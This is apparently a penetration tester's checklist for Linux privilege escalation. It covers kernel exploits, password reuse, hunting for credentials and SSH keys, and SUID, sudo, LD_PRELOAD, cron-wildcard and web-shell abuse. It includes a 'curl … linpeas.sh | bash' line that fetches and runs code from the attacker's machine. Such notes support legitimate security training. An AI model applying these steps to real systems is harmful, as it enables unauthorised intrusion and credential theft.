Skip to content

Linux Privesc Methodology

Kernel Exploits

```title="Search for exploits searchsploit 

Google the CVE for the exploit and google it to search for more exploit scripts or instructions.

## Check user id and groups
```title="Check user id and groups"
id

Google exploits for groups

Password attacks

  • Try to authenticate as other users:
    • SSH
    • su

Password reuse

Guess passwords

Run linpeas

  • Rerun as new user if a new on is accessed
curl <url to kali machine/linpeas.sh> | bash

Avoids using the victim's disk

Look for sensitive files/information

Locations that may contain passwords - Recursively search directories for files that contain sensitive keywords - Home directory - History files - Config files - Web server files - Log files - /var/log - Look for private SSH keys - Check website configurations - /etc/apache2/sites-enabled

Look for running programs

View running processes
ps aux
- Look for programs being running as root, see if exploitable - Enumerate versions, look for vulnerable/exploitable ones - If there is trouble enumerating versions, try googling the md5sum of the program - If web page is running under the context of higher privilege user, try to create a web shell

Network traffic

```View open ports / running services netstat -tulpn 

> Forward internally listening ports to attacking machine

Listen for traffic on localhost
- use tcpdump
- Might find credentials being passed over the network

- Check for port knocking configurations
    - /etc/knockd.conf


## Check for interesting programs
- PATH locations 
    - dpkg -l 
    - /var 
    - /opt 
    - /usr/local/src 
    - /usr/src 

```title="Check programs for extended capabilities"
getcap <file>

=en means root permissions. As good as sudo

Look for unmounted file systems

SUID/GUID files

  • Check GTFOBins
    Analyze file to see if commands it is calling is using absolute paths
    strace

File permissions

Sudo

Check sudo permissions
sudo -l

Check sudo commands against GTFOBins

If sudo command shows () in front of the command this means we are able to execute the command as another user

Execute sudo command as another user
sudo -u <username> <sudo command>

Environment Variables

  • Check with sudo -l
  • env_keep+=LD_PRELOAD
    • If this is set we can choose a shared object that is loaded before any others while running sudo
  • env_keep+=LD_LIBRARY_PATH
    • If this is set we can set where shared objects are searched for first.

Cron Jobs

  • Check cron PATH, see if we have write access to any directories.
  • Check if we can write to file that crontab is running
    • If so, change file to execute malicious command
    • Check if absolute paths are not being used
      • If so, try to create a malicious executable in PATH preceding PATH directory of the executable that is currently being used
  • Check commands using wildcards *
    • If so, create a file in the directory that the wildcard is being ran on. Name this file as the malicious command line options you would like to use against this program. Check GTFOBins to determine which flags to use.

systemd timers

  • New way to do cronjob on services
systemctl list-timers

Check for processes running in the background

pspy